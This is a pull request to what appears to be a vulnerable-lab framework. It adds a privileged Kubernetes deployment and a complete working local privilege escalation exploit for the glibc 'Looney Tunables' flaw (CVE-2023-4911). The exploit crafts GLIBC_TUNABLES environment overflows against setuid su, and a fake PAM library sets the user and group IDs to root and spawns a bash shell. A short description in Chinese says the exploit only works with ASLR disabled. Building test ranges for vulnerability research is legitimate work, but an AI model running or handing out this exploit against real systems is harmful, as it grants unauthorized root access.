### PR TITLE
add CVE-2023-4911 &  exploit

### DIFF
--- a/vulns_app/glibc/cve-2023-4911/cve-2023-4911-glibc.yaml
+++ b/vulns_app/glibc/cve-2023-4911/cve-2023-4911-glibc.yaml
@@ -1,0 +1,33 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  annotations:
+    kompose.cmd: kompose convert -f docker-compose.yml.backup -o vul_app/home/t-u1804/t-u1804.yaml --volumes hostPath
+    kompose.version: 1.32.0 (765fde254)
+  labels:
+    io.kompose.service: looney-tunables
+  name: cve-2023-4911-glibc
+  namespace: metarget
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      io.kompose.service: looney-tunables
+  template:
+    metadata:
+      annotations:
+        kompose.cmd: kompose convert -f docker-compose.yml.backup -o vul_app/home/t-u1804/t-u1804.yaml --volumes hostPath
+        kompose.version: 1.32.0 (765fde254)
+      labels:
+        io.kompose.network/tunables-default: "true"
+        io.kompose.service: looney-tunables
+    spec:
+      containers:
+        - image: n7utb/tunables:v6
+          name: looney-tunables
+          securityContext:
+            privileged: true
+          stdin: true
+          tty: true
+      restartPolicy: Always
+status: {}

--- a/vulns_app/glibc/cve-2023-4911/desc.yaml
+++ b/vulns_app/glibc/cve-2023-4911/desc.yaml
@@ -1,0 +1,9 @@
+name:  cve-2023-4911
+class:  glibc
+type:  local-root
+dependencies:
+  yamls:
+    - cve-2023-4911-glibc.yaml
+links:
+  - https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.tx
+  - https://github.com/RickdeJager/CVE-2023-4911/blob/main/main.c

--- a/vulns_app/glibc/cve-2023-4911/exp/exploit.c
+++ b/vulns_app/glibc/cve-2023-4911/exp/exploit.c
@@ -1,0 +1,132 @@
+#define _GNU_SOURCE
+#include<stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <stdint.h>
+#define NUM_EMPTY 0x1000
+#define NUM_ENV 0x1000 + 0x11 + 0x1
+#define ENV_ITEM_SIZE ((32 * 4096) - 1)
+
+// Enable ASLR
+// #define STACK_TARGET   0x00007ffdfffff018
+
+// NO ASLR
+#define STACK_TARGET 0x00007ffffff0c808
+
+char* p64(uint64_t val){
+    char* ret = malloc(8);
+    memset(ret, 0, 8);
+    memcpy(ret, &val, 8);
+    ret[7] = 0;
+    return ret;
+}
+char* allocation_helper(const char* base, int size, char fill){
+    char* ret = NULL;
+    char* chunk = malloc(size + 1);
+    memset(chunk, fill, size + 1);
+    chunk[size] = 0;
+    asprintf(&ret, "%s%s", base, chunk);
+    free(chunk);
+    return ret;
+}
+
+char * create_u64_filler(uint64_t val, size_t size) {
+    uint64_t * ret = malloc(size + 1);
+    // We need to make sure the allocation does not contain a premature null byte
+    memset(ret, 0x41, size);
+    for (int i = 0; i < size / 8; i++) {
+        ret[i] = val;
+    }
+    // force null-termination
+    char* ret2 = (char*)ret;
+    ret2[size] = 0;
+    return ret2;
+}
+
+void setup_dir(){
+    system("rm -rf ./\x55");
+    mkdir("./\x55", 0777);
+    system("cp /usr/lib/x86_64-linux-gnu/libc.so.6 ./\x55/libc.so.6");
+    system("cp ./suid_lib.so ./\x55/libpam.so.0");
+    system("cp ./suid_lib.so ./\x55/libpam_misc.so.0");
+}
+int main(void){
+    
+    setup_dir();
+
+    char ** new_env = malloc(sizeof(char *) * NUM_ENV + 1);
+    memset(new_env, 0, sizeof(char *) * NUM_ENV + 1);
+
+    if (new_env == NULL){
+        printf("malloc failed\n");
+        exit(1);
+    }
+
+    const char* normal1 = "GLIBC_TUNABLES=glibc.malloc.mxfast:";
+    const char* overflow = "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=";
+
+    int i = 0;
+
+    // Eat the RW section of the binary
+    new_env[i++] = allocation_helper(normal1, 0xc00, 'x');
+
+    // Allocate a new section by __minimal_malloc with 2 pages
+    new_env[i++] = allocation_helper(normal1, 0x1000 , 'A');
+
+    // trigger overflow with 0x400 bytes
+    new_env[i++] = allocation_helper(overflow, 0x4f0, 'B');
+    
+    // make the STACK_TARGET 8 bytes aligned
+    new_env[i++] = allocation_helper("", 0x1e, 'A');
+
+
+
+    for(; i <= NUM_EMPTY; i++){
+        new_env[i] = "";
+    }
+
+    new_env[0x18 * 8] = p64(STACK_TARGET);
+    
+    // align the struct link_map
+    new_env[0xff0] = allocation_helper(normal1, 0x4f0, 'C');
+
+    for(; i < NUM_ENV - 1; i++){
+        new_env[i] = create_u64_filler(0xffffffffffffffd0, ENV_ITEM_SIZE);
+    }
+
+    new_env[i-1] = "12345678901";
+    new_env[i] = 0;
+
+
+    char* new_argv[3] = {0};
+
+    new_argv[0] = "/usr/bin/su";
+    new_argv[1] = "--lmao";
+
+    int pid = fork();
+
+    if (pid < 0){
+        perror("fork failed");
+        exit(1);
+    }
+
+    if (pid){
+        int status = 0;
+        waitpid(pid, &status, 0);
+        if (status == 0){
+            puts("[+] Goodbye");
+            exit(0);
+        }
+
+        printf(".");
+    } else {
+        int rc = execve(new_argv[0], new_argv, new_env);
+        perror("execve");
+    }
+
+    
+}

--- a/vulns_app/glibc/cve-2023-4911/exp/suid_lib.c
+++ b/vulns_app/glibc/cve-2023-4911/exp/suid_lib.c
@@ -1,0 +1,48 @@
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+// This library replaces both pam and pam_misc. Make sure to only drop the shell once.
+int shell_done = 0;
+
+__attribute__((constructor)) void drop_shell()
+{
+    if (shell_done) {
+        puts("[+] Shell already dropped");
+        return;
+    }
+    shell_done = 1;
+    puts("[+] Dropping to shell");
+
+    int rc = setresuid(0, 0, 0);
+    rc |= setresgid(0, 0, 0);
+    if (rc != 0) {
+        perror("setresuid");
+        exit(1);
+    }
+
+    // Execute interactive bash
+    system("/bin/bash");
+    _exit(0);
+}
+
+#define FAKE_FUCTION(x, y) \
+    __attribute__((version(y))) \
+    int x() \
+    { \
+        return 0; \
+    }
+
+FAKE_FUCTION(pam_start, "PAM_1.0")
+FAKE_FUCTION(pam_set_item, "PAM_1.0")
+FAKE_FUCTION(pam_chauthtok, "PAM_1.0")
+FAKE_FUCTION(pam_end, "PAM_1.0")
+FAKE_FUCTION(pam_strerror, "PAM_1.0")
+FAKE_FUCTION(pam_getenvlist, "PAM_1.0")
+FAKE_FUCTION(pam_close_session, "PAM_1.0")
+FAKE_FUCTION(pam_acct_mgmt, "PAM_1.0")
+FAKE_FUCTION(pam_setcred, "PAM_1.0")
+FAKE_FUCTION(pam_authenticate, "PAM_1.0")
+FAKE_FUCTION(pam_open_session, "PAM_1.0")
+FAKE_FUCTION(misc_conv, "LIBPAM_MISC_1.0")


### PR DESCRIPTION
添加glibc 本地提权漏洞CVE-2023-4911，由于k8s配置seccomp比较麻烦，很难关闭aslr，目前的利用代码基于关闭aslr的docker编写，无法在k8s环境下利用成功，需要对aslr做一定适配。